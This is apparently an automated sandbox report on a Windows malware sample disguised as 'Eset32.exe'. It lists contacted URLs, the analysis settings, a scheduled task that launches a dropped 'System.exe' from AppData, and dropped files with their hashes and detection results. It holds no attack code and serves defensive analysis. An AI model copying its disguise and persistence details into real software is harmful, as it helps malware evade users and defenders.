            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
            https://pidgin.im00%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
            http://crl.mi0%URL Reputationsafe
            http://ip-api.com40%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://www.jsonrpc.org/0%URL Reputationsafe
            http://crl.micros0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ip-api.com
            		208.95.112.1
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://ip-api.com/line/?fields=hostingfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://sectigo.com/CPS0Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ocsp.sectigo.com0Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.entrust.net03Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://ocsp.entrust.net02Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://go.micropowershell.exe, 0000000A.00000002.510560064.0000021A948A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511051451.0000021A94B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511415597.0000021A94D18000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.entrust.net/rpa03Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://aia.entrust.net/ts1-chain256.cer01Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sEset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://pidgin.im0Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorEset32.exefalse
                            		high
                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/openwall/john/issues/3454#issuecomment-436899959System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.mipowershell.exe, 0000001E.00000002.634745548.0000024FA5AC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ip-api.com4AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://nsis.sf.net/NSIS_ErrorEset32.exefalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://ip-api.comAppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708582880.0000000006C17000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.jsonrpc.org/System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.codeplex.com/DotNetZipAppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.entrust.net/ts1ca.crl0Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name12.exe, 00000001.00000002.552111888.0000000003495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.501374621.0000021A936C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624837713.0000024F8D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679354335.000002BE88901000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.entrust.net/rpa0Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                http://crl.entrust.net/2048ca.crl0Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  http://crl.microspowershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.gnu.org/licenses/System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    208.95.112.1
                                                    		ip-api.comUnited States
                                                    		53334TUT-ASUSfalse

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:596584
                                                    Start date and time:2022-03-24 21:08:24 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 3s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:Eset32.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:37
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.mine.winEXE@40/23@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 33.3%
                                                    HDC Information:
                                                    • Successful, ratio: 15.9% (good quality ratio 15.3%)
                                                    • Quality average: 83.3%
                                                    • Quality standard deviation: 24.9%
                                                    HCA Information:
                                                    • Successful, ratio: 74%
                                                    • Number of executed functions: 168
                                                    • Number of non-executed functions: 34
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 40.125.122.176, 20.54.89.106, 52.152.110.14, 20.54.110.249, 52.242.101.226
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                    • Execution Graph export aborted for target 1.exe, PID 6656 because there are no executed function
                                                    • Execution Graph export aborted for target 12.exe, PID 5164 because it is empty
                                                    • Execution Graph export aborted for target System.exe, PID 3408 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 2600 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    22:09:51API Interceptor126x Sleep call for process: powershell.exe modified
                                                    22:10:22API Interceptor2x Sleep call for process: 12.exe modified
                                                    22:10:30Task SchedulerRun new task: System path: C:\Users\user\AppData\Roaming\Windows\System.exe
                                                    22:11:17API Interceptor1x Sleep call for process: System.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASNs

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\12.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\12.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):973
                                                    Entropy (8bit):5.374440234733254
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIDAWDLI4MWuCWzAbDLI4MNCIBTa51KDLI4MN5P6D1Bakvoc:ML9E4KrVE4K5sXE4+21qE4GiD0E4KeGj
                                                    MD5:55B1C358C76C36555547AB8BA39CB42E
                                                    SHA1:63BD54BA7CB70FB481C8D625EBA24A5E2D6564F2
                                                    SHA-256:33367C74DE2EC5A5DE6FDAD331DCBF09EB0C8EA333708F7CD3C0228D8A466240
                                                    SHA-512:D33E61E1A6304955B413893AEC1C82A13F60D775888F47E74E37F747A63CF7FB6DDF2F9963157AC061845065E436AF4F677BC22EF5346E1FF1716FE5D0DB4A50
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):973
                                                    Entropy (8bit):5.374440234733254
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIDAWDLI4MWuCWzAbDLI4MNCIBTa51KDLI4MN5P6D1Bakvoc:ML9E4KrVE4K5sXE4+21qE4GiD0E4KeGj
                                                    MD5:55B1C358C76C36555547AB8BA39CB42E
                                                    SHA1:63BD54BA7CB70FB481C8D625EBA24A5E2D6564F2
                                                    SHA-256:33367C74DE2EC5A5DE6FDAD331DCBF09EB0C8EA333708F7CD3C0228D8A466240
                                                    SHA-512:D33E61E1A6304955B413893AEC1C82A13F60D775888F47E74E37F747A63CF7FB6DDF2F9963157AC061845065E436AF4F677BC22EF5346E1FF1716FE5D0DB4A50
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):18817
                                                    Entropy (8bit):5.001217266823362
                                                    Encrypted:false
                                                    SSDEEP:384:sEvOjJiYoWVoGIpN6KQkj2dNXp5FOdBo+ib4+jjkjh4iUxL2c+4Jib4J:s0MiYoWV3IpNBQkj2dNZvOdBopj2h4iu
                                                    MD5:A30A545B73C738B58F7D7089B1C9FF63
                                                    SHA1:2F4784CFB523E34E6492F67EF7A04C7A20F16872
                                                    SHA-256:2F1991061F8982C2AAB4D49CAF78BE84E1282EFED26BE6775989B0EC4C9464BC
                                                    SHA-512:3C2DE1D82999C46EC2BA11DBA721E011950DC510F67E3226D61DF7CA9579F1F95F0BE7BE31A2BD61E92DDD1930563061131614C59D81472A92DBF529A1143316
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:PSMODULECACHE.....yH.8...I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption........l:]2...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ConfigCI\ConfigCI.psd1........Get-CIPolicyInfo........Get-CIPolicyIdInfo........Set-CIPolicySetting........Merge-CIPolicy........Edit-CIPolicyRule........Set-CIPolicyVersion........Set-CIPolicyIdInfo........ConvertFrom-CIPolicy........Set-HVCIOptions........Add-SignerRule........New-CIPolicy........Get-SystemDriver........Set-RuleOption........Get-CIPolicy......

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1280
                                                    Entropy (8bit):5.370793881110786
                                                    Encrypted:false
                                                    SSDEEP:24:3RPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKaRSF8PJKnKwl9OVMn:hPerB4nqRL/Hvfe9t4CvpR48B47Hzn
                                                    MD5:C670369412C03F8FA7DBD5472B975480
                                                    SHA1:1EABE685DDD1AB29F6BC8CE34AD8C7E51CCC0E20
                                                    SHA-256:EC2FED6FF59CE8D4D74B89B554CA364A470C45515C96D8C7E8FE76A0E5788BFB
                                                    SHA-512:D9A64D79B98BC9B8B97B26422797BA97EA25CD23066349B51520E05A6F85F6033739A6B183CB3A45D416991AA1A6C9AEC184EE120C07732A364DFD0DD21D5519
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementT...............}0.2...K.............*.Microsoft.Management.Inf

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yow3mvu.tj4.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ylat3fg.wsq.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44p5rcer.s4n.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aimqagfl.k3o.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq1rjo0b.xw4.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcrj51io.qjc.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy5qikcs.t2u.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdo0e3x0.t1b.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb0bhm4m.q4d.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_st3h5wvp.0v4.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1

                                                    C:\Users\user\AppData\Roaming\1.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Eset32.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4462384
                                                    Entropy (8bit):5.902632936497891
                                                    Encrypted:false
                                                    SSDEEP:98304:4TrAyVoOVqO5uJFH6Ws49BRo0MWTNJH7apTgVijzPM/zyQIIU/jHwPe1mKJB:lyMFobXmijLczyYU7H5Z7
                                                    MD5:D9F92868EEE8D3C8ECD29A7969419D29
                                                    SHA1:0A74749DFCD4ECA403859431EBB18BA2A7E845BF
                                                    SHA-256:B7154023E4778AC19EE6885BF403BF20CE675EF4B87F816E379FA98293526BE3
                                                    SHA-512:5F29374B1BC47F8A978D03476BD8727DCB42B0D6AD028A6DECDBBF41363C70001EA017888B5E8A44326D86D2F2FDFE39ADE6C27861B7AA317F2F09A62BAE95F7
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 37%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                    Reputation:unknown
